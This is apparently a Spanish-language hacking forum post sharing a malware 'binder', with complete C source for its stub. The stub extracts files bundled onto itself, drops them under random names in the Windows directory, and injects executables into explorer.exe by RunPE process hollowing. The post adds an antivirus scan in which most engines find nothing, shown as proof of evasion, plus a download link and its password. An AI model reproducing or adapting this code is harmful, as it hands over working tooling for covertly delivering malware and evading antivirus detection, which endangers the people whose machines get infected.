Hola! aqui les dejo el primer binder que programe, tiene ya un tiempo, pero lo probe en varios Windows, y funciona, es RunPE y soporta multiples archivos.
Pueden elegir el metodo de ejecucion, les dejo algunas imagenes, el codigo del STUB, el análisis y por supuesto el link de descarga.
(http://i58.tinypic.com/dwc7zm.png)
(http://i59.tinypic.com/20h7zwx.png)
(http://i59.tinypic.com/112a6g3.png)
#include <windows.h>
typedef LONG ( __stdcall *_NtUnmapViewOfSection ) ( IN HANDLE pFile, IN PVOID ImageBase );
/*
##########################################################################
# Stub de panda binder 1
# Diseñado y desarrollado por xxneeco83xx
# Para Underc0de.org
#
# Soporta varios archivos
#
# [email protected]
##########################################################################
*/
//Estroctura MYFILE
typedef struct TAGfile {
char extension [ MAX_PATH ];
char randomize [ MAX_PATH ];
char modex [ MAX_PATH ];
} MYFILE, *LPMYFILE;
bool __stdcall EjecuteMemory ( IN LPVOID Buffer, IN LPSTR AppName );
bool __stdcall EjecuteMemory ( IN LPVOID Buffer, IN LPSTR AppName ) {
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INTH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
PCONTEXT CTX;
PDWORD dwImageBase;
LPVOID pImageBase;
int Count = 0;
//NtUnmapViewOfSection
_NtUnmapViewOfSection NtUnmapViewOfSection = ( _NtUnmapViewOfSection ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( "NTDLL.DLL"), "NtUnmapViewOfSection" );
if ( NtUnmapViewOfSection == 0L )
{
return false;
}
IDH = PIMAGE_DOS_HEADER ( Buffer );
if ( IDH->e_magic == IMAGE_DOS_SIGNATURE )
{
INTH = PIMAGE_NT_HEADERS ( DWORD ( Buffer ) + IDH->e_lfanew );
if ( INTH->Signature == IMAGE_NT_SIGNATURE ) {
RtlZeroMemory ( &SI, sizeof ( SI ) );
RtlZeroMemory ( &PI, sizeof ( PI ) );
if ( CreateProcessA ( AppName, 0L, 0L, 0L, false, CREATE_SUSPENDED, 0, 0, &SI, &PI ) )
{
CTX = PCONTEXT ( VirtualAlloc ( 0L, sizeof ( CTX ), MEM_COMMIT, PAGE_READWRITE ) );
CTX->ContextFlags = CONTEXT_FULL;
if ( GetThreadContext ( PI.hThread, LPCONTEXT ( CTX ) ) ) {
ReadProcessMemory ( PI.hProcess, LPCVOID ( CTX->Ebx + 8), LPVOID ( &dwImageBase ), 4, 0L );
if ( DWORD ( dwImageBase ) == INTH->OptionalHeader.ImageBase )
{
NtUnmapViewOfSection ( PI.hProcess, PVOID ( dwImageBase ) );
}
else
{
return false;
}
pImageBase = VirtualAllocEx ( PI.hProcess, LPVOID ( INTH->OptionalHeader.ImageBase ), INTH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE );
if ( pImageBase ) {
WriteProcessMemory ( PI.hProcess, pImageBase, Buffer, INTH->OptionalHeader.SizeOfHeaders, 0 );
for ( Count; Count < INTH->FileHeader.NumberOfSections; Count ++ )
{
ISH = PIMAGE_SECTION_HEADER ( DWORD ( Buffer ) + IDH->e_lfanew + 248 + ( Count * 40 ) );
WriteProcessMemory ( PI.hProcess, LPVOID ( (DWORD ( pImageBase ) + ISH->VirtualAddress ) ), LPVOID ( ( DWORD ( Buffer ) + ISH->PointerToRawData ) ), ISH->SizeOfRawData, 0 );
}
WriteProcessMemory ( PI.hProcess, LPVOID ( CTX->Ebx + 8 ), LPVOID ( &INTH->OptionalHeader.ImageBase ), 4, 0 );
CTX->Eax = DWORD ( pImageBase ) + INTH->OptionalHeader.AddressOfEntryPoint;
SetThreadContext ( PI.hThread, LPCONTEXT ( CTX ) );
ResumeThread ( PI.hThread );
}
}
}
}
}
GlobalFree ( Buffer );
return TRUE;
}
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFunstil ) {
//Variables globales.
HANDLE File;
DWORD dwSize, dwBytes, a, b, c, e, d, number_files, mode, size;
//Estroctura PE
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INTH;
//Estroctura para CreateProcessA
STARTUPINFOA stinfo;
PROCESS_INFORMATION pi;
//Puntero a estroctura MYFILE
MYFILE file;
//Variables de tipo string puntero.
LPSTR Temp, Path, StubBuffer, AppName;
//Inicializamos contador random, y estrocturas stinfo y pi
srand ( GetTickCount () ); //Inicializamos el randomizador.
ZeroMemory ( &stinfo, sizeof ( stinfo ) );
ZeroMemory ( &pi, sizeof ( pi ) );
//Obtenemos nuestro nombre /*GPTR MEMORY FIXED*/
AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );
//Nos leemos
File = CreateFileA ( AppName, GENERIC_READ, FILE_SHARE_READ, 0
, OPEN_EXISTING, 0, 0 );
if ( ( File == INVALID_HANDLE_VALUE ) || ( File == 0L ) ) {
CloseHandle ( File );
GlobalFree ( AppName );
return EXIT_FAILURE;
}
//Obtenemos nuestro tamaño
dwSize = GetFileSize ( File, 0 );
//Nos leemos. /*GPTR MEMORY FIXED*/
StubBuffer = PCHAR ( GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSize + 1 ) ) );
ReadFile ( File, StubBuffer, dwSize, &dwBytes, 0 );
CloseHandle ( File );
//Liberamos nuestro nombre.
GlobalFree ( AppName );
for ( a = 0; a <= dwSize; a ++ ) {
//Buscamos la firma en el EOF
if ( ( StubBuffer [ a ] == 'c' ) && ( StubBuffer [ a + 1 ] == 'o' ) && ( StubBuffer [ a + 2 ] == 't' ) &&
( StubBuffer [ a + 3 ] == 'e' ) ) {
StubBuffer += ( a + 4 );
dwSize -= ( a + 4 );
/* Ajustamos el tamaño al del nuevo buffer, y configuramos el nuevo buffer */
break;
}
}
for ( b = 0; b <= dwSize; b ++ ) {
//Buscamos un buffer
if ( ( StubBuffer [ b ] == '*' ) && ( StubBuffer [ b + 1 ] == 'n' ) && ( StubBuffer [ b + 2 ] == 'e' ) &&
( StubBuffer [ b + 3 ] == 'w' ) && ( StubBuffer [ b + 4 ] == '*' ) ) {
//Comprobamos si estamos en el final
if ( ( StubBuffer [ b + 5 ] == 'f' ) && ( StubBuffer [ b + 6 ] == 'i' ) && ( StubBuffer [ b + 7 ] == 'n' ) ) {
GlobalFree ( Temp );
GlobalFree ( StubBuffer );
ExitProcess ( 0 );
}
//Obtenemos la extension del archivo.
CopyMemory ( & file.extension [ 0 ], & StubBuffer [ b + 5 ], 3 );
CopyMemory ( & file.modex [ 0 ], & StubBuffer [ b + 8 ], 1 );
//Obtenemos el modo a ejecutar
mode = atoi ( file.modex );
//Procedemos a buscar el final del archivo.
for ( c = b + 9; c <= dwSize; c ++ ) {
//Obtenemos el tamaño del nuevo archivo.
if ( ( StubBuffer [ c ] == '*' ) && ( StubBuffer [ c + 1 ] == 'n' ) && ( StubBuffer [ c + 2 ] == 'e' ) &&
( StubBuffer [ c + 3 ] == 'w' ) && ( StubBuffer [ c + 4 ] == '*' ) ) {
size = ( c - 1 );
break;
}
}
//Ruta del archivo a donde ejecutarnos.
char explorer [ MAX_PATH + 1 ];
wsprintfA ( explorer, "%s\\explorer.exe", getenv ( "windir" ) );
//Generamos la ruta del nuevo archivo.
wsprintfA ( file.randomize, "%s\\%d%d.%s", getenv ( "windir" ), rand () % GetSystemMetrics ( SM_CXSCREEN ), rand () % GetSystemMetrics ( SM_CYSCREEN ), file.extension );
//Obtenemos el buffer del archivo.
Temp = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( size + 1 ) );
CopyMemory ( & Temp [ 0 ], & StubBuffer [ b + 9 ], c );
//Procedemos a limpiar el buffer
int orig = size;
for ( d = 0; d <= orig; d ++ ) {
if ( ( Temp [ orig - d ] == '*' ) && ( Temp [ orig - ( d - 1 ) ] == 'n' ) &&
( Temp [ orig - ( d - 2 ) ] == 'e' ) && ( Temp [ orig - ( d - 3 ) ] == 'w' ) && ( Temp [ orig - ( d - 4 ) ] == '*' ) ) {
//Reajustamos el tamaño del archivo.
size -= ( d - 1 );
break;
}
}
//Obtenemos PE
IDH = PIMAGE_DOS_HEADER ( Temp );
INTH = PIMAGE_NT_HEADERS ( DWORD ( Temp ) + IDH -> e_lfanew );
//Procedemos a crearlo.
if ( lstrcmpA ( file.extension, "exe" ) != 0 && lstrcmpA ( file.extension, "EXE" ) != 0 )
{
File = CreateFileA ( file.randomize, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
CREATE_ALWAYS, 0, 0 );
if ( ( File == INVALID_HANDLE_VALUE ) || ( File == 0L ) ) {
CloseHandle ( File );
GlobalFree ( StubBuffer );
return EXIT_FAILURE;
}
WriteFile ( File, Temp, size, &dwBytes, 0 );
CloseHandle ( File );
}
else
{
//Comprobamos que sea ejecutable.
if ( ( IDH -> e_magic == IMAGE_DOS_SIGNATURE ) )
{
if ( ( INTH -> Signature == IMAGE_NT_SIGNATURE ) )
{
if ( mode == 0 || mode == 1 )
{
EjecuteMemory ( Temp, explorer );
}
}
}
else
{
if ( mode == 0 )
{
CreateProcessA ( file.randomize, 0, 0, 0, false, CREATE_NO_WINDOW, 0, 0, &stinfo, & pi );
}
else
{
CreateProcessA ( file.randomize, 0, 0, 0, false, CREATE_DEFAULT_ERROR_MODE, 0, 0, &stinfo, & pi );
}
/* SI no es archivo que contenga formato PE (Portable Executable) lo ejecutamos con CreateProcessA */
}
}
//Liberamos el buffer nuevamente asi podremos volver a utilizarlo en la siguiente vuelta
GlobalFree ( Temp );
//Ajustamos el buffer.
StubBuffer += ( size );
}
}
//Una vez finalizado la creacion de archivos, procederemos a liberar el buffer principal.
GlobalFree ( StubBuffer );
return EXIT_SUCCESS;
}
http://r.virscan.org/report/26672cefa3d6385da0228a5d90f9bdae (http://r.virscan.org/report/26672cefa3d6385da0228a5d90f9bdae)
Scanner Engine Ver Sig Ver Sig Date Scan result Time
ahnlab 9.9.9 9.9.9 2013-05-28 Found nothing 4
antivir 1.9.2.0 1.9.159.0 7.11.253.84 Found nothing 43
antiy AVL SDK 3.0 2014112615531100 2014-11-26 Found nothing 1
arcavir 1.0 2011 2014-05-30 Found nothing 25
asquared 9.0.0.4157 9.0.0.4157 2014-07-30 Found nothing 2
avast 150804-0 4.7.4 2015-08-04 Found nothing 56
avg 2109/8526 10.0.1405 2015-01-30 Found nothing 1
baidu 2.0.1.0 4.1.3.52192 2.0.1.0 Found nothing 4
baidusd 1.0 1.0 2014-04-02 Found nothing 1
bitdefender 7.58879 7.90123 2015-01-16 Found nothing 1
clamav 20760 0.97.5 2015-08-03 PUA.Win32.Packer.MingwGcc-2 1
comodo 15023 5.1 2015-08-01 Found nothing 3
ctch 4.6.5 5.3.14 2013-12-01 Found nothing 1
drweb 5.0.2.3300 5.0.1.1 2015-08-03 Found nothing 58
fortinet 27.158, 27.158 5.1.158 2015-08-04 Found nothing 1
fprot 4.6.2.117 6.5.1.5418 2015-08-04 W32/Felix:VC_program!Eldorado 4
fsecure 2015-08-01-02 9.13 2015-08-01 Found nothing 6
gdata 24.3819 24.3819 2014-08-29 Found nothing 7
hauri 2.73 2.73 2015-01-30 Found nothing 1
ikarus 1.06.01 V1.32.31.0 2015-08-04 Trojan.Win32.Agents 37
jiangmin 16.0.100 1.0.0.0 2015-07-30 Found nothing 21
kaspersky 5.5.33 5.5.33 2014-04-01 Found nothing 54
kingsoft 2.1 2.1 2013-09-22 Found nothing 4
mcafee 7879 5400.1158 2015-07-31 Found nothing 21
nod32 1777 3.0.21 2015-06-12 Found nothing 1
panda 9.05.01 9.05.01 2014-06-15 Found nothing 5
pcc 11.832.02 9.500-1005 2015-08-04 Found nothing 3
qh360 1.0.1 1.0.1 1.0.1 Found nothing 6
qqphone 1.0.0.0 1.0.0.0 2015-08-05 Found nothing 4
quickheal 14.00 14.00 2014-06-14 Found nothing 2
rising 25.17.00.04 25.17.00.04 2014-06-02 Found nothing 5
sophos 5.17 3.60.0 2015-08-01 Found nothing 20
sunbelt 3.9.2589.2 3.9.2589.2 2014-06-13 Found nothing 2
symantec 20150802.002 1.3.0.24 2015-08-02 Found nothing 1
tachyon 9.9.9 9.9.9 2013-12-27 Found nothing 3
thehacker 6.8.0.5 6.8.0.5 2014-06-12 Trojan/Ainslot.aa 1
tws 17.47.17308 1.0.2.2108 2014-06-16 Suspicious:Heuri.NewThreat.MVM 6
vba 3.12.26.4 3.12.26.4 2015-08-03 Found nothing 10
virusbuster 15.0.985.0 5.5.2.13 2014-12-05 Found nothing 42
Aqui el link de descarga
https://mega.nz/#!upwFTDbC!Lunv4WULb0N9MdcBP9X-wpfXl9qLtIWS3t1RwGVehVY (https://mega.nz/#!upwFTDbC!Lunv4WULb0N9MdcBP9X-wpfXl9qLtIWS3t1RwGVehVY)
PASS : xxneeco83xx
gracias por el aporte amigo.
salut